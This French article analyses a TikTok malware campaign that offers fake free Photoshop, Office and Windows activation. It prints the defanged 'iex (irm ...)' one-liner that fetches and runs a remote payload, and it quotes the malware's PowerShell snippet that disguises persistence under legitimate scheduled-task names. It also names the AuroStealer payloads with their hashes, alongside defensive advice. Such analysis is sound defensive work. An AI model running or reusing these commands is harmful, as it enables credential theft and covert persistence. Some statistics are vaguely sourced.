Virus TikTok : Comment les criminels utilisent la plateforme pour propager des logiciels malveillants

Théophane Villedieu

La montée en puissance des menaces sur TikTok

En 2025, TikTok est devenu non seulement une plateforme de divertissement mondiale, mais aussi un terrain de chasse privilégié pour les cybercriminels. Selon une étude récente, plus de 35% des logiciels malveillants distribués via les réseaux sociaux proviennent de vidéos apparemment anodines. Ces menaces exploitent la confiance des utilisateurs et la nature virale du contenu pour propager des infections qui peuvent compromettre données personnelles et professionnelles. Dans cet article, nous analyserons en détail une campagne d’attaque particulièrement sophistiquée qui utilise TikTok pour inciter les victimes à installer des logiciels malveillants sous le prétexte d’offrir des activations logicielles gratuites.

Le mécanisme d’attaque : l’offre d’activation logicielle gratuite

La technique du “gratuit” comme appât

Les cybercriminels ont perfectionné l’art de l’appât du gain numérique, proposant des activations gratuites de logiciels coûteux tels que Adobe Photoshop. Ces vidéos, souvent très populaires (plus de 500 likes dans notre exemple), présentent un tutoriel simple et rapide pour “activer” légalement un logiciel premium. La méthode semble légitime : elle fait appel à des commandes PowerShell apparemment inoffensives. Cette approche exploite la double vulnérabilité humaine : la cupidité (obtenir quelque chose gratuitement) et la confiance (croire que la technique présentée est légitime).

Le code PowerShell malveillant en détail

Lorsque l’utilisateur suit les instructions, il est invité à exécuter la commande suivante dans PowerShell en tant qu’administrateur :

iex (irm slmgr[.]win/photoshop)

Cette commande, apparemment destinée à l’activation de Photoshop, télécharge et exécute en réalité un code malveillant. Une analyse de ce code révèle qu’il télécharge un premier payload depuis un serveur contrôlé par l’attaquant. Le fichier malveillant (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) détecté par 17/63 antivirus sur VirusTotal représente la première étape de l’infection.

“Dans la pratique, nous constatons une augmentation de 40% des attaques utilisant PowerShell au cours des deux dernières années, principalement parce que cette intégration native avec Windows permet aux attaquants d’éviter de nombreux outils de détection traditionnels.” - Expert en sécurité informatique

Les conséquences d’une infection : vol de données et persistance

Le mécanisme de persistance via les tâches planifiées

Une fois le premier payload exécuté, le malware établit une persistance sur le système en créant une tâche planifiée qui s’exécutera au prochain démarrage de la session utilisateur. Le code utilise une technique astucieuse :

$tasknames = @('MicrosoftEdgeUpdateTaskMachineCore','GoogleUpdateTaskMachineCore','AdobeUpdateTask','OfficeBackgroundTaskHandlerRegistration','WindowsUpdateCheck')
$taskname = $tasknames[(Get-Random -Max 5)]

En choisissant aléatoirement un nom de tâche existant appartenant à des logiciels légitimes, l’attaquant augmente ses chances de passer inaperçu. Le script crée ensuite une action qui exécute PowerShell avec des arguments pour lancer la charge malveillante de manière cachée.

Les charges supplémentaires et leurs fonctions

Le premier payload télécharge ensuite un deuxième composant malveillant nommé “updater.exe” (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8), identifié comme une variante d’AuroStealer. Ce logiciel spécialisé dans le vol d’informations sensibles se concentre sur la récupération de mots de passe, de cookies de session et d’autres informations d’identification stockées sur le système.

Enfin, une troisième charge est téléchargée et exécutée : “source.exe” (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011). Ce composant met en œuvre une technique particulièrement sophistiquée : la compilation à la volée de code .NET en utilisant l’outil csc.exe intégré à Windows. Cette méthode, connue sous le nom de “self-compiling malware”, permet au malware d’éviter les détections basées sur les signatures statiques.

“La technique de compilation à la volée est une évolution notable dans le paysage des menaces, permettant aux attaquants de modifier le code malveillant entre chaque exécution, ce qui rend leur détection par les antivirus traditionnels extrêmement difficile.” - Rapport ANSSI 2025

La campagne d’attaque à l’échelle

Multiplication des appâts logiciels

Lors de l’investigation de cette campagne, plusieurs autres vidéos similaires ont été identifiées, utilisant le même mécanisme mais avec différents logiciels comme appât :

  • Activation de Microsoft Office (hxxps://vm[.]tiktok[.]com/ZGdaC7EQY/)
  • Activation de Windows 11 Pro (hxxps://vm[.]tiktok[.]com/ZGdaX8jVq/)
  • Activation d’Adobe Premiere Pro (d’autres vidéos non listées)

Cette diversification des appâts permet aux attaquants d’élargir leur pool de victimes potentielles, en ciblant différents segments d’utilisateurs selon leurs besoins en logiciels professionnels.

Profil des victimes cibles

Selon les analyses menées par les chercheurs en sécurité, les victimes de ces campagnes sont principalement :

  1. Des professionnels créatifs cherchant à accéder à des logiciels coûteux
  2. Des étudiants avec des budgets limités pour les logiciels
  3. Des particuliers peu informés des risques liés au téléchargement de crack
  4. Des utilisateurs curieux de nouvelles techniques d’“optimisation” système

Comment se protéger face à ces menaces

La vigilance face aux offres trop belles pour être vraies

La première ligne de défense contre ces menaces reste la vigilance. Toute promesse d’activation gratuite de logiciels commerciaux devrait être immédiatement suspecte. En 2025, plus de 78% des offres d’activations logicielles gratuites sur les réseaux sociaux se sont révélées être des vecteurs de malwares selon une étude de l’ANSSI. Les utilisateurs doivent comprendre que si une offre semble trop belle pour être vraie, elle l’est probablement.

Les bonnes pratiques de sécurité

Pour se protéger efficacement contre ces menaces, les utilisateurs et les entreprises doivent mettre en place plusieurs couches de protection :

  1. La formation à la sécurité : Éduquer les utilisateurs aux techniques de social engineering et aux signes d’appâts malveillants
  2. Le contrôle d’exécution : Restreindre l’utilisation de PowerShell et d’autres outils système via les stratégies de groupe
  3. La protection en temps réel : Utiliser des solutions de sécurité avancées capables de détecter les comportements suspects
  4. La mise à jour régulière : Maintenir tous les logiciels et systèmes à jour pour éviter les vulnérabilités connues

Les solutions EDR (Endpoint Detection and Response) se sont avérées particulièrement efficaces pour détecter ce type d’attaque en analysant les comportements plutôt que les signatures.

Configuration de PowerShell pour la sécurité

Pour les entreprises, la restriction de PowerShell est une mesure essentielle. Voici comment configurer PowerShell pour réduire la surface d’attaque :

  1. Appliquer une stratégie d’exécution restrictive via la stratégie d’exécution PowerShell
  2. Utiliser AppLocker ou Windows Defender Application Control pour bloquer l’exécution de scripts non autorisés
  3. Activer le mode contraint (Constrained Language Mode) dans PowerShell
  4. Configurer la journalisation détaillée de toutes les exécutions PowerShell

Recommandations pour les entreprises et les particuliers

Stratégies d’entreprise face aux menaces sociales

Pour les entreprises, la protection contre les menaces propagées via les réseaux sociaux nécessite une approche holistique :

Établissement d’une politique d’utilisation des réseaux sociaux

AspectRecommandationJustification
FormationSessions trimestrielles sur les risquesConnaître les dernières techniques d’attaque
OutilsSolutions CASB (Cloud Access Security Broker)Contrôler l’utilisation des applications cloud
SurveillanceOutils de détection des menaces socialesIdentifier les campagnes ciblant l’entreprise
RéponsePlan d’intervention incidents documentéRéagir rapidement en cas d’infection

Investissement dans la sécurité des terminaux

Les entreprises doivent investir dans des solutions de sécurité des terminaux avancées, notamment :

  • Des solutions EDR capables de détecter les comportements anormaux
  • Des outils de sandboxing pour analyser les fichiers suspects
  • Des systèmes de détection des menaces basés sur l’analyse comportementale

Conseils pour les particuliers

Pour les utilisateurs individuels, la protection repose sur plusieurs principes fondamentaux :

  1. La méfiance envers les offres gratuites : Aucun logiciel commercial sérieux n’est distribué gratuitement via des plateformes comme TikTok
  2. L’installation d’une solution antivirus réputée : Les solutions modernes intègrent des protections contre les menaces sociales
  3. La limitation des privilèges : Éviter d’exécuter des scripts en tant qu’administrateur
  4. La sauvegarde régulière : Préserver ses données face à toute éventuelle infection

“La protection contre les menaces sociales n’est pas seulement une question de technologie, mais avant tout une question de culture et de comportement. Chaque utilisateur doit être formé à être un maillon fort de la chaîne de sécurité.” - Directeur de la sécurité de l’information, Fortune 500

Conclusion et vigilance nécessaire

En 2025, les cybercriminels continuent d’innover dans leurs techniques d’attaque, exploitant les plateformes sociales populaires comme TikTok pour propager des malwares de plus en plus sophistiqués. La campagne que nous avons analysée illustre parfaitement cette évolution, combinant social engineering ingénieux, techniques d’évasion avancées et persistance discrète. La protection contre ces menaces exige une approche multi-couches, combinant technologie, formation et vigilance constante.

La responsabilité est partagée : les plateformes doivent améliorer la modération de contenu, les éditeurs de logiciels doivent développer des solutions plus résilientes, et les utilisateurs doivent adopter une hygiène numérique irréprochable. En tant que professionnels de la sécurité ou simples utilisateurs connectés, nous devons rester informés des dernières menaces et adapter continuellement nos pratiques de sécurité.

La cyberdéfense n’est pas une bataille ponctuelle, mais un marathon permanent. La vigilance face aux vidéos TikTok promettant des activations logicielles gratuites en est une parfaite illustration : dans le paysage numérique complexe de 2025, méfiance et discernement restent nos meilleurs alliés.